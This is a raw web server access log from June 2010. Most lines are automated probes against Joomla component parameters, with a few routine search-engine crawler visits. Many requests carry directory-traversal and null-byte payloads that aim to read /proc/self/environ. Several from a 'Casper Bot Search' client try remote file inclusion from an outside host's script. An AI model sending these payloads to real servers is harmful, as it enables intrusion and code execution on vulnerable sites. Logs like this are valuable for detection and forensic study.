78.110.50.134 - - [27/Jun/2010:20:28:04 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
87.118.96.160 - - [27/Jun/2010:20:28:08 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
78.110.50.134 - - [27/Jun/2010:20:28:08 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
207.7.108.242 - - [27/Jun/2010:20:28:11 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:20:28:11 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
78.110.50.134 - - [27/Jun/2010:20:28:12 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
87.118.96.160 - - [27/Jun/2010:20:28:18 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:20:28:21 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
78.110.50.134 - - [27/Jun/2010:20:28:23 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:28:53 -0500] "GET /logs/access_log.1276732800/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:28:54 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:28:54 -0500] "GET /logs/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
87.118.96.160 - - [27/Jun/2010:20:29:10 -0500] "GET /logs/access_log.1276732800/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:20:29:11 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:20:29:11 -0500] "GET /logs/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
78.110.50.134 - - [27/Jun/2010:20:29:12 -0500] "GET /logs/access_log.1276732800/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:29:12 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:29:13 -0500] "GET /logs/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
87.118.96.160 - - [27/Jun/2010:20:29:19 -0500] "GET /logs/access_log.1275782400/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
78.110.50.134 - - [27/Jun/2010:20:29:23 -0500] "GET /logs/access_log.1275782400/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
207.7.108.242 - - [27/Jun/2010:20:29:45 -0500] "GET /logs/access_log.1274572800//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:20:29:45 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:20:29:45 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
78.110.50.134 - - [27/Jun/2010:20:29:52 -0500] "GET /logs/access_log.1276041600/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:29:52 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:29:53 -0500] "GET /logs/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:29:55 -0500] "GET /logs/access_log.1276473600/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
87.118.96.160 - - [27/Jun/2010:20:29:56 -0500] "GET /logs/access_log.1276041600/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:20:29:57 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:20:29:57 -0500] "GET /logs/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:20:29:58 -0500] "GET /logs/access_log.1276473600/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
78.110.50.134 - - [27/Jun/2010:20:30:01 -0500] "GET /logs/access_log.1276041600/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:30:01 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:30:02 -0500] "GET /logs/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:30:03 -0500] "GET /logs/access_log.1276473600/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:30:05 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
207.7.108.242 - - [27/Jun/2010:20:30:05 -0500] "GET /logs/access_log.1276041600/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:20:30:06 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:20:30:06 -0500] "GET /logs/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:20:30:09 -0500] "GET /logs/access_log.1276473600/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
78.110.50.134 - - [27/Jun/2010:20:30:11 -0500] "GET /logs/access_log.1276041600/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:30:11 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:30:12 -0500] "GET /logs/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
207.7.108.242 - - [27/Jun/2010:20:30:14 -0500] "GET /logs/access_log.1276041600/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:20:30:14 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:20:30:14 -0500] "GET /logs/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:20:30:16 -0500] "GET /logs/access_log.1276473600/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
78.110.50.134 - - [27/Jun/2010:20:30:18 -0500] "GET /logs/access_log.1276732800/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
207.7.108.242 - - [27/Jun/2010:20:30:50 -0500] "GET /logs/access_log.1276041600/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:20:30:50 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:20:30:51 -0500] "GET /logs/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:20:30:56 -0500] "GET /logs/access_log.1276732800/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
81.31.149.80 - - [27/Jun/2010:20:31:01 -0500] "GET /logs/access_log.1275696000/.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 315 "-""libwww-perl/5.808"
81.31.149.80 - - [27/Jun/2010:20:31:01 -0500] "GET /.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 288 "-""libwww-perl/5.808"
81.31.149.80 - - [27/Jun/2010:20:31:01 -0500] "GET /logs/.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.808"
87.118.96.160 - - [27/Jun/2010:20:31:02 -0500] "GET /logs/access_log.1276041600/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:20:31:02 -0500] "GET /index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:20:31:02 -0500] "GET /logs/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.803"
87.118.96.160 - - [27/Jun/2010:20:31:06 -0500] "GET /logs/access_log.1276732800/index.php?option=com_ticketbook&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:20:31:28 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
78.110.50.134 - - [27/Jun/2010:20:31:44 -0500] "GET /logs/access_log.1274054400//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:31:44 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:31:45 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
207.7.108.242 - - [27/Jun/2010:20:33:15 -0500] "GET /logs/access_log.1274832000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
216.38.49.38 - - [27/Jun/2010:20:33:28 -0500] "GET /logs/access_log.1275609600/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
216.38.49.38 - - [27/Jun/2010:20:33:28 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.38.49.38 - - [27/Jun/2010:20:33:29 -0500] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
216.38.49.38 - - [27/Jun/2010:20:33:43 -0500] "GET /logs/access_log.1275609600/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
216.38.49.38 - - [27/Jun/2010:20:33:43 -0500] "GET /index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
216.38.49.38 - - [27/Jun/2010:20:33:44 -0500] "GET /logs/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
216.38.49.38 - - [27/Jun/2010:20:34:05 -0500] "GET /logs/access_log.1275091200/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
91.198.130.7 - - [27/Jun/2010:20:34:13 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:20:34:13 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 11233 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:20:34:13 -0500] "GET /logs/access_log.1276214400/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:20:34:19 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:20:34:19 -0500] "GET /logs/access_log.1276732800/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:20:34:21 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 11233 "-""Casper Bot Search"
216.38.49.38 - - [27/Jun/2010:20:34:24 -0500] "GET /logs/access_log.1275091200/index.php?option=com_jinventory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:36:34 -0500] "GET /logs/access_log.1276819200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:36:34 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:36:35 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
207.46.194.82 - - [27/Jun/2010:20:37:10 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
207.46.194.82 - - [27/Jun/2010:20:37:10 -0500] "GET /artwork/clinic5.JPG HTTP/1.1" 200 9589 "-""msnbot-media/1.1 (+http://search.msn.com/msnbot.htm)"
91.198.130.7 - - [27/Jun/2010:20:38:56 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 299 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:20:38:56 -0500] "GET /logs/access_log.1275004800/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 321 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:20:38:56 -0500] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 294 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:20:41:58 -0500] "GET /logs/access_log.1276732800/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 311 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:20:41:58 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 11233 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:20:41:58 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Casper Bot Search"
78.110.50.134 - - [27/Jun/2010:20:43:18 -0500] "GET /logs/access_log.1275264000//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:43:19 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:43:19 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
78.110.50.134 - - [27/Jun/2010:20:43:23 -0500] "GET /logs/access_log.1276819200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
207.7.108.242 - - [27/Jun/2010:20:45:06 -0500] "GET /logs/access_log.1276819200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:20:45:07 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
207.7.108.242 - - [27/Jun/2010:20:45:07 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
207.46.13.91 - - [27/Jun/2010:20:47:10 -0500] "GET /logs/access_log.1169769600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.198.130.7 - - [27/Jun/2010:20:47:26 -0500] "GET /?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 1003 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:20:47:26 -0500] "GET /logs/access_log.1276732800%20%20/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 313 "-""Casper Bot Search"
91.198.130.7 - - [27/Jun/2010:20:47:26 -0500] "GET /logs/?option=com_ninjarsssyndicator&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 200 11233 "-""Casper Bot Search"
207.46.195.237 - - [27/Jun/2010:20:48:40 -0500] "GET /logs/access_log.1211414400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
110.45.144.106 - - [27/Jun/2010:20:49:53 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:20:49:53 -0500] "GET /logs/access_log.1274832000/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:20:49:58 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:20:49:59 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:20:50:04 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:20:50:04 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:20:53:08 -0500] "GET /logs/access_log.1277164800/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.79"
110.45.144.106 - - [27/Jun/2010:20:53:14 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.79"
